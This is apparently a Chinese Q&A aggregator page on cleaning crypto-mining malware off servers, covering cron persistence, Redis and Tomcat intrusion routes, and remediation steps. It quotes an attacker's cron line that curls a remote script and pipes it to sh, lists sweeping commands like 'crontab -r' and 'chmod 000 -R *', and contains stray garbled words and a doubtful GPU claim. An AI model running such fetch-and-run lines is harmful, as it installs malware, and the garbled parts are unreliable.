當前位置:首頁 » 挖礦知識 » 伺服器被挖礦重啟怎麼辦

伺服器被挖礦重啟怎麼辦

發布時間: 2023-09-03 13:47:38

① 《輕松挖礦》內核一直反復重啟怎麼辦

輕松礦工內核一直重啟是因為你的顯卡容量不夠,需要增加顯卡。

開始挖礦後一直內核重啟原因:可能是高級設置的附加參數錯誤;可能是顯卡不支持該幣種;可能是虛擬內存不夠;可能是內核選擇錯誤;可能是內核文件被當病毒刪除。

通常情況,設置足夠的虛擬內存後即可開始挖礦。新用戶無需過度關心高級參數,以免越看越暈。

定時重啟電腦,在設定的時間重啟電腦。0表示不定時重啟電腦,單位:小時。

算力低於設定值超過3分鍾,重啟電腦,0表示不重啟(該參數有異議,設置需謹慎)。

輕松礦工

輕松礦工是一款功能十分強大的電腦挖礦軟體,在當前這個礦潮之下,幾乎所有的人都在挖礦,用戶可通過該軟體選擇自己要挖的幣種進行深度計算,用戶可選擇單挖也可選擇建立礦場。

該軟體能夠讓用戶的硬體釋放百分百的挖礦性能,大大提高用戶的挖礦效率,且這款軟體的抽水比例非常低,可大大保障用戶的挖礦收益。

② 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

③ CPU被挖礦排查方案

查看/root/.ssh/authorized_keys

如果有authorized_keys文件中的公鑰請及時清理,或者刪除該文件
當使用rm刪除文件和文件夾的時候提示:rm: 無法刪除"bash": 不允許的操作
解決方法:

2.cpu使用率基本跑滿(用戶態),沒有發現可疑的進程,初步懷疑可能是進程在哪裡隱藏了
可能是起的一個守護進程
執行命令ps -aux --sort=-pcpu|head -10

查看高鏈者dns
果然dns被修改了

發現定時任務被加入了一條
0 */8 * * * root /usr/lib/libiacpkmn

根據定時任務中的可疑文件所在路徑/usr/lib/libiacpkmn
排查中發現/etc/rc.d/init.d/, /usr/bin/存在可執行文件nfstruncate,
在rc0.d-rc6.d目錄下都存在S01nfstruncate文件,可能是自啟動文件
現在排查的很明朗了,接下來著手清理工作

使用top命令觀察佔用cpu程序的PID

通過PID查看該程序所在的目錄:ls /proc/{PID}/
執行ll /proc/{PID}查看該程序運行的目錄

將這些文件的許可權全部修改成000,使這些程序無法繼續執行:chmod 000 -R *

然後kill -9 {PID}

補充:
執行crontab -l 查看是否有可疑計劃任務在執行,如有請及時刪除(crontab -r)
通過上面的排查步驟我們可以看到cron程序是運行在/root/.bashtemp/a目錄下的,但/root/.bashtemp/目錄下還有很多這樣的程序,所以也要執行:chmod 000 -R * 將所有惡意程序戚薯的許可權清除
一般來講通過以上步驟可以將惡意程序幹掉,但喚宏不排除不法分子還留有其他後門程序,為了避免類似情況發生,建議保存重要數據後重裝操作系統,後續請對伺服器做安全加固,以免再次被入侵,比如更改默認遠程埠、配置防火牆規則、設置復雜度較高的密碼等方法

備註:部分可參考 https://zhuanlan.hu.com/p/96601673

④ 新買的雲伺服器提示挖礦

利用雲電腦的計算資源執行挖礦的持續性程序,
已停止是服務絕大數都是正常的。這些已停止表示你已經禁用或停止了相關的服務,但停止不是卸載,所以它們仍然存在是正常的,每台電腦里都有許多已停止的差念服務,不用擔心。你真正要擔心的是360那個提示,可在任務管理器中查著虛兄困活動進程,若某進程CPU或內存佔用高,而你又不明確該進程是塵肢幹嘛的,可以先結束進程再看看360還會不會提醒!

⑤ windows伺服器的挖礦進程怎麼關閉刪除

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後,使用裡面的病毒查殺功能,直接就可以查殺這種電腦病毒了

⑥ 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

⑦ 挖礦病毒怎麼處理

挖礦病毒處理步驟如下:

1、查看伺服器進程運行狀態查看伺服器系統整體運行情況,發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。

2、查看埠及外聯情況查看埠開放狀態及外聯情況,發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址,進一步確定該進程為惡意挖礦進程:定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。

6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。

7、查找敏感文件發現authorized_keys文件。

8、查看ssh日誌文件查看ssh日誌文件,發現大量登陸痕跡以及公鑰上傳痕跡。

⑧ 伺服器被rshim挖礦病毒攻擊後 HugePages_Total 透明大頁怎麼都清不掉 一直佔用內存 球球

問題定位及解決步驟:

1、free -m 查看內存使用狀態 ,發現free基本沒了。--> 懷疑是服務有內存泄漏,開始排查

2、使用top命令觀察,開啟的服務佔用內存量並不大,且最終文檔在一個值,且服務為java應用,內存並沒達到父jvm設置上限。按top監控佔用內存排序,加起來也不會超過物理內存總量。查看硬碟使用量,佔用20%。基本排除虛擬內存佔用過大的原因。--->排除服務內存泄漏因素,懷疑mysql和nginx,開始排查

3、因為top命令看 mysql佔用內存也再可控范圍,是否存在connection佔用過多內存,發現並不會,設置最大連接數為1000,最多也不會超過幾M。 nginx佔用一直非常小。但每次最先被kill的基本都是nginx進程。所以排查,但發現無非就是openfiles數量啥的調整。發現也一切正常。且之前niginx可以正常使用的。

4、最為費解的就是 通過free -m 查看的時候 基本全是used,cache部分很少,free基本沒有。但top上又找不到有哪些進程佔用了內存。無解

5、注意到有兩個進程雖佔用內存不多,但基本耗光了100%的cpu。開始想著佔cpu就佔了,沒占內存,現在是內存不不夠導致進程被kill的,就沒注意這點。

6、實在搞不定,重啟伺服器,重啟了所有服務,服務暫時可用,回家。在路上的時候發現又崩了。忐忑的睡覺。

7、早上起來繼續看,這次留意注意了下那兩個佔用高cpu的進程,kdevtmpfsi 和 networkservice。本著看看是啥進程的心態,網路了下。真相一目瞭然,兩個挖礦病毒。

突然後知後覺的意識到錯誤原因:

1、cpu佔用率高,正常服務使用cpu頻率較高的服務最容易最內存超標。(因為在需要使用cpu時沒cpu資源,內存大量佔用,服務瞬間崩潰),然後看top發現剛剛已經佔用內存的進程已經被kill了,所以沒發現內存有高佔用的情況。
2、後面的應用繼續使用cpu時也會發生類似情況,倒是服務一個一個逐漸被kill。

問題點基本定位好了,解決問題就相對簡單很多:
通過網路,google,常見的病毒清除步驟基本都能解決。這兩個挖礦病毒很常見,大致記錄下要點。可能所有病毒都會有這些基礎操作。

① 首先,查看當前系統中的定時任務:crontab -l
我伺服器上有四個定時下載任務 通過wget 和 curl 下載病毒文件,把異常的刪掉。要不然刪了病毒文件還是會下載下來
crontab -r,全部刪除命令(或根據需求刪除定時任務)

② 查找病毒文件 可以全部模糊搜索 清除, 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 後再使用rm -f filename 。可刪除

③ kill 病毒進程,但注意kill了可能馬上就重啟了。因為有守護進程,需要把病毒進程的守護進程也kill掉

④ 檢查是否root用戶被攻擊,可能系統配置信息被更改。

⑤ 最好能理解病毒腳本,通過看代碼看它做了些什麼。針對腳本取修復系統。

熱點內容
eth轉賬手續費給多少 發布:2025-06-17 14:29:48 瀏覽:333
usdt泰達幣在哪裡買 發布:2025-06-17 14:05:02 瀏覽:855
區塊鏈上的區塊周 發布:2025-06-17 13:43:02 瀏覽:433
eth價值預測 發布:2025-06-17 12:46:39 瀏覽:380
撿到電信合約機怎麼查到期 發布:2025-06-17 12:39:21 瀏覽:182
eth算力降低為什麼 發布:2025-06-17 12:37:37 瀏覽:980
eth和顯卡 發布:2025-06-17 12:35:22 瀏覽:716
USDT交易所不會風控 發布:2025-06-17 12:04:19 瀏覽:676
算力股 發布:2025-06-17 11:56:01 瀏覽:503
區塊鏈網路工程師 發布:2025-06-17 11:55:11 瀏覽:775